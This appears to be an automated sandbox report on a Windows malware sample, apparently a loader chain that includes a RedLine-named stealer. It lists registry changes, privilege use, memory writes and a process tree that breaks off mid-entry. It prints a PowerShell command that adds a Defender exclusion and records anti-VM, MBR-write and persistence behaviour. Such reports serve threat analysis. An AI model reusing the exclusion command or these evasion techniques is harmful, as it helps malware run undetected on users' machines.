description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FA1BBD2F-E8B6-4DD1-8D1E-6567BD2EE38B}\06-06-a1-c9-6d-1e eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-06-a1-c9-6d-1e\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs eKfotrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-06-a1-c9-6d-1e\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ eKfotrz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FA1BBD2F-E8B6-4DD1-8D1E-6567BD2EE38B}\WpadNetworkName = "Network 3" eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates eKfotrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-06-a1-c9-6d-1e eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs eKfotrz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FA1BBD2F-E8B6-4DD1-8D1E-6567BD2EE38B} eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust eKfotrz.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000000075096121b9da01 EByWAxd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" EByWAxd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates eKfotrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FA1BBD2F-E8B6-4DD1-8D1E-6567BD2EE38B}\WpadDecisionReason = "1" eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs eKfotrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs eKfotrz.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f007b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" eKfotrz.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f007b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections eKfotrz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" eKfotrz.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eKfotrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-06-a1-c9-6d-1e\WpadDecisionReason = "1" eKfotrz.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs eKfotrz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates eKfotrz.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 eKfotrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" EByWAxd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates eKfotrz.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 HqA55f547cg1gL6v7PJmBsf8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 HqA55f547cg1gL6v7PJmBsf8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 HqA55f547cg1gL6v7PJmBsf8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 HqA55f547cg1gL6v7PJmBsf8.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 2596 axplong.exe 1200 powershell.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 2700 HqA55f547cg1gL6v7PJmBsf8.exe 320 powershell.exe 320 powershell.exe 320 powershell.exe 2880 powershell.exe 1960 powershell.exe 1960 powershell.exe 1960 powershell.exe 1104 powershell.EXE 1932 redline123123.exe 1104 powershell.EXE 1104 powershell.EXE 1932 redline123123.exe 1932 redline123123.exe 1704 powershell.exe 1976 FirstZ.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 1960 powershell.exe 1252 eKfotrz.exe 1252 eKfotrz.exe 1252 eKfotrz.exe 1252 eKfotrz.exe 1252 eKfotrz.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 2116 powershell.exe 1976 FirstZ.exe 1252 eKfotrz.exe 1252 eKfotrz.exe 1252 eKfotrz.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 1976 FirstZ.exe 2580 reakuqnanrkn.exe 2736 powershell.exe 2484 powershell.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 2580 reakuqnanrkn.exe 1364 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 2280 regsvcs.exe Token: SeManageVolumePrivilege 1712 QpVB2zLMp5uymu8SyDWvJowq.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeIncreaseQuotaPrivilege 2876 WMIC.exe Token: SeSecurityPrivilege 2876 WMIC.exe Token: SeTakeOwnershipPrivilege 2876 WMIC.exe Token: SeLoadDriverPrivilege 2876 WMIC.exe Token: SeSystemProfilePrivilege 2876 WMIC.exe Token: SeSystemtimePrivilege 2876 WMIC.exe Token: SeProfSingleProcessPrivilege 2876 WMIC.exe Token: SeIncBasePriorityPrivilege 2876 WMIC.exe Token: SeCreatePagefilePrivilege 2876 WMIC.exe Token: SeBackupPrivilege 2876 WMIC.exe Token: SeRestorePrivilege 2876 WMIC.exe Token: SeShutdownPrivilege 2876 WMIC.exe Token: SeDebugPrivilege 2876 WMIC.exe Token: SeSystemEnvironmentPrivilege 2876 WMIC.exe Token: SeRemoteShutdownPrivilege 2876 WMIC.exe Token: SeUndockPrivilege 2876 WMIC.exe Token: SeManageVolumePrivilege 2876 WMIC.exe Token: 33 2876 WMIC.exe Token: 34 2876 WMIC.exe Token: 35 2876 WMIC.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 1104 powershell.EXE Token: SeDebugPrivilege 1932 redline123123.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeAssignPrimaryTokenPrivilege 524 WMIC.exe Token: SeIncreaseQuotaPrivilege 524 WMIC.exe Token: SeSecurityPrivilege 524 WMIC.exe Token: SeTakeOwnershipPrivilege 524 WMIC.exe Token: SeLoadDriverPrivilege 524 WMIC.exe Token: SeSystemtimePrivilege 524 WMIC.exe Token: SeBackupPrivilege 524 WMIC.exe Token: SeRestorePrivilege 524 WMIC.exe Token: SeShutdownPrivilege 524 WMIC.exe Token: SeSystemEnvironmentPrivilege 524 WMIC.exe Token: SeUndockPrivilege 524 WMIC.exe Token: SeManageVolumePrivilege 524 WMIC.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeShutdownPrivilege 1504 powercfg.exe Token: SeShutdownPrivilege 2224 powercfg.exe Token: SeShutdownPrivilege 852 powercfg.exe Token: SeShutdownPrivilege 1860 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 2332 WMIC.exe Token: SeIncreaseQuotaPrivilege 2332 WMIC.exe Token: SeSecurityPrivilege 2332 WMIC.exe Token: SeTakeOwnershipPrivilege 2332 WMIC.exe Token: SeLoadDriverPrivilege 2332 WMIC.exe Token: SeSystemtimePrivilege 2332 WMIC.exe Token: SeBackupPrivilege 2332 WMIC.exe Token: SeRestorePrivilege 2332 WMIC.exe Token: SeShutdownPrivilege 2332 WMIC.exe Token: SeSystemEnvironmentPrivilege 2332 WMIC.exe Token: SeUndockPrivilege 2332 WMIC.exe Token: SeManageVolumePrivilege 2332 WMIC.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1360 WMIC.exe Token: SeIncreaseQuotaPrivilege 1360 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1712 QpVB2zLMp5uymu8SyDWvJowq.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2876 wrote to memory of 2596 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 28 PID 2876 wrote to memory of 2596 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 28 PID 2876 wrote to memory of 2596 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 28 PID 2876 wrote to memory of 2596 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 28 PID 2596 wrote to memory of 792 2596 axplong.exe 30 PID 2596 wrote to memory of 792 2596 axplong.exe 30 PID 2596 wrote to memory of 792 2596 axplong.exe 30 PID 2596 wrote to memory of 792 2596 axplong.exe 30 PID 792 wrote to memory of 1200 792 file300un.exe 32 PID 792 wrote to memory of 1200 792 file300un.exe 32 PID 792 wrote to memory of 1200 792 file300un.exe 32 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 792 wrote to memory of 2280 792 file300un.exe 34 PID 2596 wrote to memory of 1248 2596 axplong.exe 35 PID 2596 wrote to memory of 1248 2596 axplong.exe 35 PID 2596 wrote to memory of 1248 2596 axplong.exe 35 PID 2596 wrote to memory of 1248 2596 axplong.exe 35 PID 2280 wrote to memory of 1712 2280 regsvcs.exe 36 PID 2280 wrote to memory of 1712 2280 regsvcs.exe 36 PID 2280 wrote to memory of 1712 2280 regsvcs.exe 36 PID 2280 wrote to memory of 1712 2280 regsvcs.exe 36 PID 2280 wrote to memory of 1712 2280 regsvcs.exe 36 PID 2280 wrote to memory of 1712 2280 regsvcs.exe 36 PID 2280 wrote to memory of 1712 2280 regsvcs.exe 36 PID 2280 wrote to memory of 2700 2280 regsvcs.exe 40 PID 2280 wrote to memory of 2700 2280 regsvcs.exe 40 PID 2280 wrote to memory of 2700 2280 regsvcs.exe 40 PID 2280 wrote to memory of 2700 2280 regsvcs.exe 40 PID 2280 wrote to memory of 800 2280 regsvcs.exe 41 PID 2280 wrote to memory of 800 2280 regsvcs.exe 41 PID 2280 wrote to memory of 800 2280 regsvcs.exe 41 PID 2280 wrote to memory of 800 2280 regsvcs.exe 41 PID 2280 wrote to memory of 800 2280 regsvcs.exe 41 PID 2280 wrote to memory of 800 2280 regsvcs.exe 41 PID 2280 wrote to memory of 800 2280 regsvcs.exe 41 PID 800 wrote to memory of 672 800 iw2rdwuO01Y7ysK806SnpS14.exe 42 PID 800 wrote to memory of 672 800 iw2rdwuO01Y7ysK806SnpS14.exe 42 PID 800 wrote to memory of 672 800 iw2rdwuO01Y7ysK806SnpS14.exe 42 PID 800 wrote to memory of 672 800 iw2rdwuO01Y7ysK806SnpS14.exe 42 PID 800 wrote to memory of 672 800 iw2rdwuO01Y7ysK806SnpS14.exe 42 PID 800 wrote to memory of 672 800 iw2rdwuO01Y7ysK806SnpS14.exe 42 PID 800 wrote to memory of 672 800 iw2rdwuO01Y7ysK806SnpS14.exe 42 PID 672 wrote to memory of 2132 672 Install.exe 43 PID 672 wrote to memory of 2132 672 Install.exe 43 PID 672 wrote to memory of 2132 672 Install.exe 43 PID 672 wrote to memory of 2132 672 Install.exe 43 PID 672 wrote to memory of 2132 672 Install.exe 43 PID 672 wrote to memory of 2132 672 Install.exe 43 PID 672 wrote to memory of 2132 672 Install.exe 43 PID 2132 wrote to memory of 2196 2132 Install.exe 44 PID 2132 wrote to memory of 2196 2132 Install.exe 44 PID 2132 wrote to memory of 2196 2132 Install.exe 44 PID 2132 wrote to memory of 2196 2132 Install.exe 44 PID 2132 wrote to memory of 2196 2132 Install.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe"C:\Users\Admin\AppData\Local\Temp\33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\1000002001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\file300un.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"4⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Users\Admin\Pictures\QpVB2zLMp5uymu8SyDWvJowq.exe"C:\Users\Admin\Pictures\QpVB2zLMp5uymu8SyDWvJowq.exe" /s5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1712 -
C:\Users\Admin\Pictures\360TS_Setup.exe"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:272 -
